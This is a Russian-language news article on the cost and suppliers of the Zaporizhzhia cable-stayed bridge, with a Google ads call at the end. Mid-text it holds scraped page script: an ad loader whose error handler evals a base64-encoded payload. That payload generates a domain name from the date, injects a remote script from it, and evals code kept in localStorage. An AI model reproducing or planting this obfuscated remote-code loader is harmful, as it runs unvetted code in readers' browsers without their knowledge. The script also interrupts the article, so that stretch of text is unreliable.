Строительство Запорожского мостового перехода обошлось украинским налогоплательщикам в 11,92 млрд грн.
Об этом, подводя итоги строительства написал на GMK-centr написал заместитель главы «Укравтодора» Андрей Ивко.
Строительство моста продолжительностью в 17 лет близится к завершению. В начале декабря был завершен монтаж всех 48 вантовых канатов на мосту в Запорожье, а к концу этого года движение первым проездом вантового моста будет открыто.
«Ванты для моста заказали в Швейцарии на сертифицированном заводе. Он имел опыт производства таких конструкций и предоставлял наибольшую гарантию в Европе – 8 лет. Служба автомобильных дорог, инженеры независимого технического надзора ІС Consulenten и ведущие специалисты ГП «ГосдорНИИ» контролировали процесс производства.» — пишет Ивко.
Ванты запорожского моста состоят из круглопрядной сердцевины и пяти слоев Z-образных проволок. На одном конце ванты – вилочный анкер, а на другом – цилиндрический.
«В Украине подобный вид продукции, к сожалению, не производится. Поэтому пришлось заказать в Швейцарии. Потратив на это 188 млн грн, мы надеемся, что швейцарские ванты прослужат в Запорожье не менее 100 лет.» — рассказывает чиновник. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Однако, кроме стальных канатов из Швейцарии, на этом мосту использовано также много украинского металла.
«Мы потратили около 30 тыс. т стали и металлоконструкций отечественных производителей. Основные конструкции поставляли CKS (1213 т), «Укрсталь Конструкция» (4038 т) и «Укрстальспецконструкция» (10 618 т). Остальные вспомогательные металлические конструкции общим весом 13 642 т поставили предприятия «Спецмашремонт», «Никопрогрессстрой», «Павлоград ЗММ», «СМД-Инвест», СМУ-13, УТГ-69, ЗДР и другие.» — говорится в тексте.
В целом строительство этого мостового перехода обошлось украинским налогоплательщикам в 11,92 млрд грн. В эту сумму входит стоимость контракта с турецким подрядчиком на остаток работ. Еще почти 3 млрд грн было потрачено на мостовое строительство в Запорожье в предыдущие годы. Все запорожцы знают, что два новых моста через реку Днепр начали строить еще в 2004 году. Но из-за нехватки средств закончить строительство всё никак не удавалось.
«Ждать осталось уже недолго. Сейчас на вантовом мосту продолжаются геодезические обследования. Когда они завершатся, пролетное строение моста будет опущено на 1,5 м в проектное положение» — уверяет Ивко.
Движение по сооружениям №1, 2, 3, 4, 5 (верховая часть) уже открыто. В течение месяца планируется открыть движение по сооружениям №9, 10, 11 (верховая часть). Весь комплекс работ планируется завершить в 2022 году. (adsbygoogle = window.adsbygoogle || []).push({});
Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/desyatki-tysyach-tonn-ukrainskogo-metalla-ushli-na-stroitelstvo-mostov-v-zaporozhe-ivko/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook